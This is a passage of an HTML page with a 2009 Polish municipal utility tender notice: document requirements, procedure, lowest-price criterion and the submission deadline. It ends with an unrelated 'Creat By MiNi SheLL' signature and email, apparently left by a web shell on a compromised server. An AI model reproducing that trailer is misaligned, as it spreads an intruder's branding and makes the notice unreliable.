     b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
     c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
    2.  pkt 8 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.  
    3. Dokumenty, o których mowa w pkt 1 lit a i c oraz pkt 2, powinny być  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
    Dokument, o którym mowa w pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.  
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1, 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu     
zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pgk-radomsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. ul. Stara Droga 85, 97-500 Radomsko - Dział Rozwoju i Marketingu, pok. nr 217, tel. 044 683 06 30 wew. 45.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 12:00, miejsce: Sekretariat Przedsiębiorstwa Gospodarki Komunalnej Spółka z o.o., 
ul. Stara Droga 85, 97-500 Radomsko.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com